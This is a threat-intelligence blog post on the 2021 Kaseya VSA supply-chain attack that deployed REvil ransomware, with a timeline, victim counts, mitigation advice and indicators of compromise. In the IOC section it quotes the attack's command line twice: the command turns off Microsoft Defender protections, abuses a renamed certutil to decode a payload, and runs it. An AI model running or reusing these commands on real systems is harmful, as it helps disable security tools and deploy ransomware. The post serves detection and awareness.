1000 Business Worldwide Were Hit By Kaseya Supply-Chain Attack With REvil Ransomware

Researchers have discovered that the Russia-linked REvil ransomware gang first targets the Florida-based IT company “Kaseya” and then spread through corporate networks that use its software. According to researchers, more than 1000 business were hit by Kaseya supply-chain attack until now.

The company’s CEO Fred Voccola quoted, “Beginning around mid-day (EST/US) on Friday, July 2, 2021, Kaseya’s Incident Response team learned of a potential security incident involving our VSA software”. In a statement shared late Friday. In response to the attack, The company has shut down its SaaS servers as a precautionary measure. In addition to that, the company notified their customers to shut down their on-premises VSA servers to prevent them from being compromised.

Update: Now, almost ten days later, on 11th July, Kaseys has released a patch for VSA supply-chain attack. The Florida-based software company has fixed three new security vulnerabilities in the released patch to address critical security issues in its Virtual System Administrator (VSA) solution. With this update, the company has fixed a total of seven vulnerabilities, including the three new vulnerabilities. Let’s see the changes Kaseya has made in the VSA release 9.5.7a.

Voccola also said that it had identified the source of the Kaseya supply-chain attack. And it is creating a patch to mitigate the ongoing issues.

Mark Loman, a Malware Analyst from Sophos Tweated, The Kaseya supply-chain attack seems to stem from a malicious Kaseya update. According to him, the attack used Kaseya VSA to deploy a variant of the REvil ransomware into a victim’s environment. He also added that the supply-chain attack attempts to disable Microsoft Defender Real-Time Monitoring via PowerShell.

Victims Of Kaseya Supply-Chain Attack:

Initially, Researchers from Huntress Labs found eight managed service providers (MSPs) had been hit by the attack. About 200 businesses that took the IT services from those eight MSPs have been locked out of parts of their network. Recent studies from the Dutch Institute for Vulnerability Disclosure (DIVD) show that REvil ransomware might have used a number of zero-day vulnerabilities in its VSA software (CVE-2021-30116) to exploit and deploy the ransomware. DIVD also said that these zero-days are trivial to exploit, and about 1000 businesses from more than 17 countries, including the U.K., South Africa, Canada, Argentina, Mexico, Indonesia, New Zealand, and Kenya, were affected by the attack.

Current Updates Of Kaseya Supply-Chain Attack:

We recommend visiting these two pages regularly to have updated information about the Kaseya supply-chain attack.

Updates from Huntress Incident Response team: https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident

Latest updates from Kaseya: https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689-Important-Notice-July-2nd-2021

What To Do If You Are Hit by Kaseya supply-chain Attack?

Recommendations for all:

1. It is recommended that all on-premise VSA servers should continue to remain down until further instructions. 
2. Block all the IOC on your routers, firewalls, web proxies, and EDRs.
3. Monitor your IT infrastructure 24×7 for malicious activities. 
4. Perform Threat Hunting to uncover suspicious activities 

Recommendations for MSPs:

1. download the Compromise Detection Tool developed by Kaseya to Identify the IOCs.
2. Identify the IOCs
3. Enable multifactor authentication
4. Limit communication with (RMM) remote monitoring and management capabilities to known IP address pairs
5. Place the administrative interfaces of RMM behind a VPN or a firewall

Recommendations for MSP’s customers:

1. Please keep all the backups up to date and stored them in an easily retrievable location to initiate the restoration process whenever you require to restore the services from the backups
2. Use the manual patching process to install the patches. Test the patches on the lower environment before applying to production
3. Enable multifactor authentication

Indicators Of Compromise (IOCs):

Sophos Detections

• Troj/Ransom-GIP
• Troj/Ransom-GIQ
• HPmal/Sodino-A
  • Detected in C:/Windows/MsMpEng.exe
• DynamicShellcode
  • hmpa.exploit.prevented.1
• Cryptoguard
  • cryptoguard.file.detected.1

Process Data:

• “C:/WINDOWS/system32/cmd.exe” /c ping 127.0.0.1 -n 6258 > nul & C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:/Windows/System32/certutil.exe C:/Windows/cert.exe & echo %RANDOM% >> C:/Windows/cert.exe & C:/Windows/cert.exe -decode c:/kworking/agent.crt c:/kworking/agent.exe & del /q /f c:/kworking/agent.crt C:/Windows/cert.exe & c:/kworking/agent.exe
  • Parent Path – C:/Program Files (x86)/Kaseya/<ID>/AgentMon.exe
• “C:/Windows/system32/cmd.exe” /c ping 127.0.0.1 -n 5693 > nul & C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:/Windows/System32/certutil.exe C:/Windows/cert.exe & echo %RANDOM% >> C:/Windows/cert.exe & C:/Windows/cert.exe -decode c:/kworking/agent.crt c:/kworking/agent.exe & del /q /f c:/kworking/agent.crt C:/Windows/cert.exe & c:/kworking/agent.exe
  • Parent Path – C:/Program Files (x86)/Kaseya/<ID>/AgentMon.exe

Files Involved

• C:/windows/cert.exe
  • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
• C:/windows/msmpeng.exe
  • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
• C:/kworking/agent.crt
• C:/Windows/mpsvc.dll
  • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
• C:/kworking/agent.exe
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

Registry Keys:

HKEY_LOCAL_MACHINE/SOFTWARE/Wow6432Node/BlackLivesMatter

Ransomware Extension:

<victim ID>-readme.txt

File Hashes:

36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752
33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a

Domains 

• ncuccr[.]org
• 1team[.]es
• 4net[.]guru
• 35-40konkatsu[.]net
• 123vrachi[.]ru
• 4youbeautysalon[.]com
• 12starhd[.]online
• 101gowrie[.]com
• 8449nohate[.]org
• 1kbk[.]com[.]ua
• 365questions[.]org
• 321play[.]com[.]hk
• candyhouseusa[.]com
• andersongilmour[.]co[.]uk
• facettenreich27[.]de
• blgr[.]be
• fannmedias[.]com
• southeasternacademyofprosthodontics[.]org
• filmstreamingvfcomplet[.]be
• smartypractice[.]com
• tanzschule-kieber[.]de
• iqbalscientific[.]com
• pasvenska[.]se
• cursosgratuitosnainternet[.]com
• bierensgebakkramen[.]nl
• c2e-poitiers[.]com
• gonzalezfornes[.]es
• tonelektro[.]nl
• milestoneshows[.]com
• blossombeyond50[.]com
• thomasvicino[.]com
• kaotikkustomz[.]com
• mindpackstudios[.]com
• faroairporttransfers[.]net
• daklesa[.]de
• bxdf[.]info
• simoneblum[.]de
• gmto[.]fr
• cerebralforce[.]net
• myhostcloud[.]com
• fotoscondron[.]com
• sw1m[.]ru
• homng[.]net

Thanks for reading this threat post. We believe it’s our duty to share information about the threats to create awareness and secure the digital world.

• 5 Challenges of Cyber Security in today’s business!
• How to Fix the BIOSConnect and HTTPS Boot Vulnerabilities Found on 129 Dell Models (30 million devices)?
• How DarkRadiation Ransomware Attacks Targets Linux and Docker Instances?
• Early-stage indicators of Ryuk and Conti Ransomware attacks
• 10 Cybersecurity professions which are in high demand